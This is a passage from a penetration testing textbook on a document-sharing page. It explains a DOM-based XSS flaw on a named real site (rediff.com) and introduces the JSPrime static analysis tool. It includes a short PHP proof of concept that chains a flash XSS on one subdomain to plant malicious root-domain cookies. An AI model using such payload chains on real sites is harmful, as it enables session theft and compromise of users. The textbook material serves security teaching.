Ethical Hacking and Penetration Testing Guide



Yüklə 22,44 Mb.
Pdf görüntüsü
səhifə231/235
tarix07.08.2023
ölçüsü22,44 Mb.
#138846
1   ...   227   228   229   230   231   232   233   234   235
Ethical Hacking and Penetration Testing Guide ( PDFDrive )

Vulnerable code
The getcookie function is used for fetching the cookie values.


384
◾ 
Ethical Hacking and Penetration Testing Guide
Two variables “Rlo” and “Rm” are now defined, the rlo variable is set to “getcookie(“Rlo”)” 
and the same is done with “Rm.” Both now hold the value of cookies and are user-controllable 
inputs, but for exploitation. The values of “RLO” and “RM” should not be equal to null, which is 
what the “if” clause is checking. Finally, the rlo cookies are written via innerHTML sink.
Now in order to exploit it, we need to find any other XSS in any other subdomain of the 
website we are trying to exploit; in this case, it is rediff.com and so we are able to manipulate the 
cookies. By using the other XSS, we will set a root domain cookie (which is accessible from all 
subdomains). So root domain cookie with XSS vector would do the trick, as getcookie will read 
Rlo cookie’s value and execute it under blogs.rediff.com, which is the domain containing the vul-
nerable JavaScript code.
The researcher managed to find a flash-based XSS in a subdomain “imworld.rediff.com.”
POC
header('Location: http://imworld.rediff.com/livewirerediff/pix/swfupload.
swf#?movieName="]);}catch(e){}document.cookie="Rm=notnull; domain=.
rediff.com;Path=/;";document.cookie="Rlo=onload=alert(\'XSS\')>;domain=.rediff.com;Path=/;";location="http://
blogs.rediff.com/nonexistentpage";//');
?>
The first part of code sets the cookie values RM to “notnull” and “rlo” to our XSS vector and 
then redirects to blogs.rediff.com/nonexistentpage, where we have the vulnerable js code hosted. 
This results in a JavaScript execution.
Static JS Analysis to Identify DOM-Based XSS
As mentioned before, analyzing JavaScript can be taxing at times, considering you have a million 
lines of code to analyze. As manual inspection is not a good option here, static code analyzers can 
be used to analyze DOM-based XSS vulnerabilities. Let’s take a look at a static JavaScript analysis 
tool called JSPrime introduced by Nishant Das Patnaik.


Web Hacking
◾ 
385
Jsprime is a static source code analysis tool coded in JavaScript to identify vulnerabilities in 
JavaScript itself. Based upon ECMAscript parser, it is capable of not only identifying DOM-based 
XSS vulnerabilities in JavaScript but also analyzing JavaScript libraries such as jquery and yui.

Yüklə 22,44 Mb.

Dostları ilə paylaş:
1   ...   227   228   229   230   231   232   233   234   235




Verilənlər bazası müəlliflik hüququ ilə müdafiə olunur ©azkurs.org 2024
rəhbərliyinə müraciət

gir | qeydiyyatdan keç
    Ana səhifə


yükləyin